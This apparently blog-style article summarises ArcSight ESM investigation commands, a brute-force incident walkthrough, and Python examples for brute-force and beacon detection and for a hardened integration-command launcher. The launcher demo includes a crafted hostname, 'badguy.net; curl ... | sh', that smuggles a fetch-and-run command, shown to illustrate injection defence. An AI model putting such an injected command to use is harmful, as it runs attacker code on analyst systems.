How To Become An ArcSight CSI
- Pavan Raja

- Apr 8, 2025
- 10 min read
Summary:
This text discusses IdentityView, a product in ArcSight's security suite. IdentityView attributes every user activity to a named user and reports on specific users' actions. It integrates with third-party ticketing systems (such as ServiceNow), with Threat Response Manager (TRM) for investigating potential policy violations, with HR systems to watch particular classes of user (for example contractors or terminated employees), and with applications to maintain a baseline of normal behaviour and alert on misuse cases.
The document also describes the investigation commands that can be launched from the console against a selected address or string:
- Investigate: Blacklisted Sites - checks whether the selected IP address appears on external blacklists.
- Investigate: DNS Lookup - resolves the domain name of the selected item to its IP address.
- Investigate: Internet Port Scan - scans the selected IP address or domain for open ports with Nmap.
- Investigate: Malware Protection Center (Target Address) - looks the target address up in Microsoft's Malware Protection Center for known malware associated with it.
- Investigate: NBTstat - runs nbtstat against the selected address to list its NetBIOS name table (machine name, domain or workgroup, logged-on user), which also confirms that the host is up.
- Investigate: NetWitness Integration - opens the selection in NetWitness, presumably for deeper packet-level analysis within that tool.
- Investigate: NMAP (UDP) - runs an Nmap UDP scan against the selected address to find open UDP ports and the services behind them.
- Investigate: Open Shares - lists the network shares exported by the selected address, which is useful for finding hosts that expose data.
These commands are designed to help analysts in various aspects of cybersecurity, including detecting unauthorized access attempts, identifying potential threats, and monitoring compliance with corporate policies.
This document outlines further investigation commands in ArcSight. The commands are designed to gather information about different data types such as IP addresses and strings. Here is a summary of each command mentioned:
1. **Investigate: OS Fingerprint** - runs an Nmap OS-detection scan (nmap -O) against the selected IP address or string to identify the operating system.
2. **Investigate: Packet Capture** - runs windump on a specific interface (interface 3) to capture the traffic to and from the selected IP address or string, a quick way to obtain a packet capture of a suspect host in real time.
3. **Investigate: PathPing** - runs pathping, which traces the route packets take to the selected IP address or string and reports packet loss and latency for each hop.
4. **Investigate: RFC Ignorant** - opens a URL at rfc-ignorant.org (a DNS blocklist of domains that ignored mail-related RFCs, for example by having no working postmaster or abuse mailbox; the service has since shut down) to check the domain associated with the selected IP address or string.
5. **Investigate: SMTP Check** - uses the external MxToolbox service to check the Simple Mail Transfer Protocol (SMTP) configuration of the selected mail server IP address or string.
6. **Investigate: Suspected Malware (Target Address)** - queries a database of known malicious addresses and domains to see whether the target IP address is listed as associated with malware activity.
7. **Investigate: Threat Expert** - searches ThreatExpert.com, an automated malware-analysis service, for reports that mention the selected domain or IP address.
8. **Investigate: Vulnerability Scan** - launches a Nessus scan of the selected IP address for known vulnerabilities in its exposed services (the example shows ports 139, 445, 10150 and 34477).
9. **Investigate: Windows Event** - looks the selected event's class ID up in a third-party Windows event ID reference database.
Each command has a configuration name, attributes, and a context that determines where it is offered within the ArcSight console (for example in the event Viewer, the Editor, or Assets). The commands help analysts analyze network traffic, detect potential threats, check for vulnerabilities, and gather information about connected devices through script execution, URL queries, and external tool integrations.
Details:
The article discusses how to become an ArcSight C.S.I., which stands for Collect, Store, Investigate. It explains that network forensics involves using science and technology to collect, fuse, identify, examine, correlate, analyze, and document digital evidence from multiple sources for the purpose of uncovering facts related to unauthorized activities meant to disrupt, corrupt, or compromise systems. The article highlights the challenges faced by cyber investigators such as islands of defense, large volumes of data, preserving evidence, using various tools without a workflow, ensuring admissibility, and lacking interception points.
ArcSight assists in investigations by providing centralized data collection with a single pane-of-glass view, 40+ TB of log storage for forensic analysis, integration with third-party tools, automated or manual execution capabilities, integrated case management to establish chain-of-custody, and the ability to quarantine threats during an investigation. ArcSight also offers IdentityView for monitoring employee activity by name and Threat Detector for establishing baselines and detecting deviations from normal behavior. Additionally, it provides real-time input from open-source threat intelligence feeds through Threat Intelligence Accelerator.
The article contrasts a 12+ hour investigation without ArcSight with one that takes only 3 hours when using ArcSight. It also lists typical use cases for corporate investigations and discusses the challenges faced by cyber investigators.
The provided text outlines a cybersecurity incident response process involving multiple steps and actions taken to investigate an alleged brute-force attack against a financial system in Hong Kong. Here's a summary of the key points from the text:
1. **Initial Request for Logs**: A user requested logs from the server team, which was denied without manager approval. The request was escalated through management to obtain the necessary logs.
2. **Firewall Analysis**: After logging into the firewall console and identifying consistent traffic from IP 172.16.100.2, Snort was set up with a signature to monitor this activity. However, due to low disk space, the capture had to be stopped after capturing around 6 GB of data.
3. **Log Collection**: The server team eventually provided logs which were analyzed using Grep for instances of IP 172.16.100.2. These logs indicated numerous authentication failures related to the user "admin" and OpenLDAP.
4. **Threat Analysis**: Snort alerts suggested a continuous attempt to connect to the finance server at high rates (over 100 attempts per second) and other consistent activity every 10 minutes with another IP on the internet. Searching online led to the assumption that this target IP was associated with malware or a botnet.
5. **Isolation**: The network team was contacted to disable the switch port connected to the host identified as compromised (IP 172.16.100.2). Confirmation of quarantine completion was received from the network team.
6. **Incident Detection and Response with ArcSight**: An ESM console was used to create a case for the suspected attack on the finance system, filtering activities related to IP 172.16.100.2. Further analysis included using Snort for packet capture, NMAP for OS fingerprinting, VA scanning, and Black List lookups.
7. **Malware Identification**: The malware was identified as Bredolab C&C after discovering it was registered on a blacklist and having details in the Malware Protection Center.
8. **Case Documentation and Assignment**: All findings were documented in the case editor, with the assessment that the host had been compromised by hackers using brute-force attacks against the finance system. The case was assigned to the network team for further action.
This summary highlights the use of various tools (firewall console, Snort, Grep, NMAP, VA scanning, and blacklist lookups) in a systematic incident response process involving log analysis, packet capture, and malware identification to detect and respond to an alleged cyber attack.
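The two signals in the walkthrough (authentication failures from 172.16.100.2 at more than 100 per second, and a connection to one outside host every 10 minutes) are exactly what a SIEM correlation rule checks for. The detection logic below is an added example, not code from the page or from ArcSight. It runs over CEF lines constructed to match the scenario (CEF is the format ArcSight connectors normalise events into); the vendor, product and signature values, the timestamps, and the addresses 10.1.1.20, 203.0.113.9 and 198.51.100.4 are my own assumptions.

```python
"""Detection logic for the two signals in the walkthrough: a high-rate LDAP
bind brute force and a periodic (beaconing) outbound connection.

Added example, not code from the page or from ArcSight. The events are
constructed below in CEF, the format ArcSight connectors normalise to; the
vendor/product/signature values and addresses are assumptions for the sample.
"""
import re
from collections import defaultdict
from statistics import median

T0 = 1_268_000_000_000          # constructed base timestamp, epoch milliseconds

HEADER_RE = re.compile(
    r"^CEF:0\|(?P<vendor>[^|]*)\|(?P<product>[^|]*)\|(?P<version>[^|]*)\|"
    r"(?P<sig_id>[^|]*)\|(?P<name>[^|]*)\|(?P<severity>[^|]*)\|(?P<ext>.*)$")
EXT_RE = re.compile(r"(\w+)=(\S+)")     # constructed extension values contain no spaces


def parse_cef(line):
    """Parse one CEF line into a flat dict of header fields plus extension keys."""
    m = HEADER_RE.match(line)
    if not m:
        raise ValueError(f"not a CEF line: {line!r}")
    event = m.groupdict()
    event.update(EXT_RE.findall(event.pop("ext")))
    return event


def _ldap_failure(rt, src):
    return ("CEF:0|OpenLDAP|slapd|2.4|49|Bind failed: invalid credentials|5|"
            f"rt={rt} src={src} dst=10.1.1.20 dpt=389 suser=admin")


def _outbound(rt, dst):
    return ("CEF:0|Example|Firewall|1.0|100|Connection accepted|2|"
            f"rt={rt} src=172.16.100.2 dst={dst} dpt=443 act=accept")


def build_sample_log():
    """Constructed events shaped like the scenario, not real logs."""
    lines = []
    # 300 bind failures in two seconds = 150/s, above the 100/s the page cites
    lines += [_ldap_failure(T0 + i * 1000 // 150, "172.16.100.2") for i in range(300)]
    # a few failures from another host: a mistyped password, not an attack
    lines += [_ldap_failure(T0 + 5_000 + i * 7_000, "172.16.50.7") for i in range(3)]
    # six connections to one outside host 600 s apart (+-1.5 s of jitter)
    lines += [_outbound(T0 - 3_600_000 + k * 600_000 + (k % 2) * 1_500, "203.0.113.9")
              for k in range(6)]
    # irregular, browsing-like connections to another outside host
    lines += [_outbound(T0 + s * 1_000, "198.51.100.4") for s in (0, 120, 900, 950, 3000)]
    return lines


def brute_force_sources(events, threshold_per_sec=100):
    """Sources whose LDAP bind failures exceed threshold_per_sec in some
    one-second bucket. Returns {src: {"peak_per_sec", "users", "targets"}}."""
    per_second = defaultdict(int)
    detail = defaultdict(lambda: {"users": set(), "targets": set()})
    for e in events:
        if e["product"] == "slapd" and e["sig_id"] == "49":   # 49 = invalidCredentials
            per_second[(e["src"], int(e["rt"]) // 1000)] += 1
            detail[e["src"]]["users"].add(e["suser"])
            detail[e["src"]]["targets"].add(e["dst"])
    peaks = defaultdict(int)
    for (src, _sec), n in per_second.items():
        peaks[src] = max(peaks[src], n)
    return {src: {"peak_per_sec": n, **detail[src]}
            for src, n in peaks.items() if n > threshold_per_sec}


def beacon_candidates(events, min_hits=5, max_jitter=0.1):
    """(src, dst) pairs that connect at a near-constant interval: at least
    min_hits accepted connections whose gaps all lie within max_jitter of the
    median gap. Returns {(src, dst): period_seconds}."""
    times = defaultdict(list)
    for e in events:
        if e["product"] == "Firewall" and e.get("act") == "accept":
            times[(e["src"], e["dst"])].append(int(e["rt"]) / 1000)
    found = {}
    for pair, ts in times.items():
        if len(ts) < min_hits:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        period = median(gaps)
        if period > 0 and max(abs(g - period) for g in gaps) <= max_jitter * period:
            found[pair] = period
    return found


def analyse(lines):
    """Parse the lines and return (brute-force sources, beacon candidates)."""
    events = [parse_cef(line) for line in lines]
    return brute_force_sources(events), beacon_candidates(events)


if __name__ == "__main__":
    brute, beacons = analyse(build_sample_log())
    print("brute force:", brute)
    print("beacons:", beacons)
```

On the sample, the brute-force check reports 172.16.100.2 peaking at 150 failures per second against the admin account on 10.1.1.20, and the beacon check reports the 600-second pattern to 203.0.113.9 while ignoring the irregular connections to 198.51.100.4. The one-second bucket and the jitter tolerance are the tunable parts; a real rule would also suppress known scanners and scheduled jobs, which beacon legitimately.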
ArcSight is a security vendor whose Enterprise Security Manager (ESM) is a security information and event management (SIEM) platform for collecting, correlating and investigating security events. The provided document outlines the features of ESM 4.5 SP1, focusing on the integration commands it adds for investigating cyber threats with external tools.
The ESM platform includes several key components:
**Collect**: event collection from the full range of log sources, the slides singling out industrial control systems (ICS) and VoIP (Voice over IP) systems as sources that also need to be monitored.
**Store**: storage of raw log files, a relational database for ACID-transactional event storage (the slides mention MySQL), and storage of payload data such as captured packets tied to security incidents.
**Investigate**: This module is focused on analyzing cyber threats through various tools and methods:
**Event Normalization**: Standardizes event details across different sources for easier analysis.
**Identity Correlation / User Monitoring**: Analyzes user activities to identify patterns or anomalies that may indicate security breaches.
**Session Re-Assembly**: Reconstructs network sessions to understand the sequence and flow of events, which is crucial in forensic investigations.
**Case Management**: Manages all aspects of an investigation through a workflow system, including reporting and maintaining chain-of-custody/integrity.
**Tools Integration**: Introduces new integration commands that allow for lightweight data exchange between information sources:
Command execution mechanisms include a URI (an HTTP request), a local script or executable, and the CounterACT connector used by Threat Response Manager (TRM).
Result rendering can be internal or external web browser display, executing script outputs, attaching results to a case, or saving them as files.
**Integration Commands**: These are specific tools used for investigation:
DNS Lookup, Malware Protection Center, OS Fingerprint, Vulnerability Scan, and more, each corresponding to different network tasks like scanning ports, checking for malware, or identifying system vulnerabilities.
**Scenario Examples**: Illustrate how integration commands can be applied in real scenarios, such as investigating suspicious activity related to "badguy.net".
**Cyber Investigation Considerations**: Addresses the practicalities of choosing compatible tools based on operating systems and considering remote execution options for packet capture or other tasks.
The document also introduces ArcSight Threat Detector, which aids analysts in identifying logical relationships between events during investigations, enhancing the correlation process significantly. The integration commands are designed to be flexible, allowing for local command execution across various network tasks, with results being documented and added as attachments to cases for long-term tracking and reporting.
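The integration commands listed in the summary above and the execution mechanisms just described all take a value out of an event (an address or hostname that the attacker may well have chosen) and hand it to a local command or a URL. The launcher below is an added example, not ArcSight's code: it shows the naive string-pasting form beside a hardened one that validates the selection, builds an argv list instead of a shell string, bounds the run with a timeout, and hashes the saved output for the case record. The command names follow the page and the flags are the standard ones for nslookup, nmap, nbtstat, pathping and windump; the lookup hosts (*.example) and the "{target}" placeholder are my own, not ESM's parameter syntax.

```python
"""A launcher in the shape of an ESM integration command: it takes the value
the analyst selected in the console (an address or hostname lifted from a
log) and turns it into a local command or a lookup URL, then saves the output
for attachment to the case.

Added example, not ArcSight's code. Command names follow the page; the flags
are the standard ones for nslookup, nmap, nbtstat, pathping and windump. The
lookup URLs (*.example) and the "{target}" placeholder are my own, not ESM's
parameter syntax.
"""
import hashlib
import ipaddress
import re
import subprocess
from urllib.parse import quote

# argv templates; "{target}" is replaced with the validated selection.
# nbtstat, pathping and windump are Windows tools, so this mapping belongs on
# a Windows analyst workstation (the page's "choose tools per OS" point).
SCRIPT_COMMANDS = {
    "DNS Lookup":         ["nslookup", "{target}"],
    "Internet Port Scan": ["nmap", "-Pn", "{target}"],
    "NMAP (UDP)":         ["nmap", "-sU", "{target}"],
    "OS Fingerprint":     ["nmap", "-O", "{target}"],
    "NBTstat":            ["nbtstat", "-A", "{target}"],
    "PathPing":           ["pathping", "{target}"],
    "Packet Capture":     ["windump", "-i", "3", "-c", "1000", "host", "{target}"],
}
# URL templates (placeholder hosts); opened in the console's browser.
URL_COMMANDS = {
    "Blacklisted Sites": "https://blocklist.example/lookup?ip={target}",
    "SMTP Check":        "https://mxcheck.example/smtp?host={target}",
}
# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def validate_target(value):
    """Return the selection if it is an IP address or a hostname, else raise.
    The value came out of a log, so an attacker may have chosen it; anything
    with shell metacharacters, whitespace or URL syntax is refused."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"refusing to use {value!r} as a command argument")


def unsafe_command_line(name, raw_value):
    """What a naive integration command does: paste the raw selection into a
    shell string. Returned for display only, never executed here."""
    return " ".join(SCRIPT_COMMANDS[name]).replace("{target}", raw_value)


def build_argv(name, raw_value):
    """Hardened form: validate first, then substitute into an argv list."""
    target = validate_target(raw_value)
    return [part.replace("{target}", target) for part in SCRIPT_COMMANDS[name]]


def build_url(name, raw_value):
    """Validate, then percent-encode the selection into the URL template."""
    target = validate_target(raw_value)
    return URL_COMMANDS[name].replace("{target}", quote(target, safe=""))


def evidence_digest(text):
    """SHA-256 of the saved output, recorded in the case for chain of custody."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def run_script_command(name, raw_value, outfile, timeout=300):
    """Run the command without a shell and with a time limit, save its output
    to outfile, and return (exit status, SHA-256 of the saved text)."""
    argv = build_argv(name, raw_value)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    text = "$ " + " ".join(argv) + "\n" + proc.stdout
    if proc.stderr:
        text += "\n[stderr]\n" + proc.stderr
    with open(outfile, "w", encoding="utf-8") as fh:
        fh.write(text)
    return proc.returncode, evidence_digest(text)


if __name__ == "__main__":
    crafted = "badguy.net; curl http://badguy.net/x | sh"   # constructed hostile value
    print("naive:", unsafe_command_line("DNS Lookup", crafted))
    try:
        build_argv("DNS Lookup", crafted)
    except ValueError as err:
        print("hardened:", err)
    print(build_argv("OS Fingerprint", "172.16.100.2"))
    print(build_url("Blacklisted Sites", "badguy.net"))
```

The point of the example is the first two lines it prints: a hostname that arrived in a log as "badguy.net; curl ... | sh" becomes a second command if the integration command is a shell string, and is refused outright when the selection is validated and passed as one argv element. The same validation protects the URL commands, where an unescaped selection can inject extra query parameters into the lookup request.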
Overall, this document serves to demonstrate how ArcSight ESM 4.5 SP1 enhances cyber investigation capabilities through comprehensive integration of diverse tools and robust case management features, enabling faster identification and response to potential threats.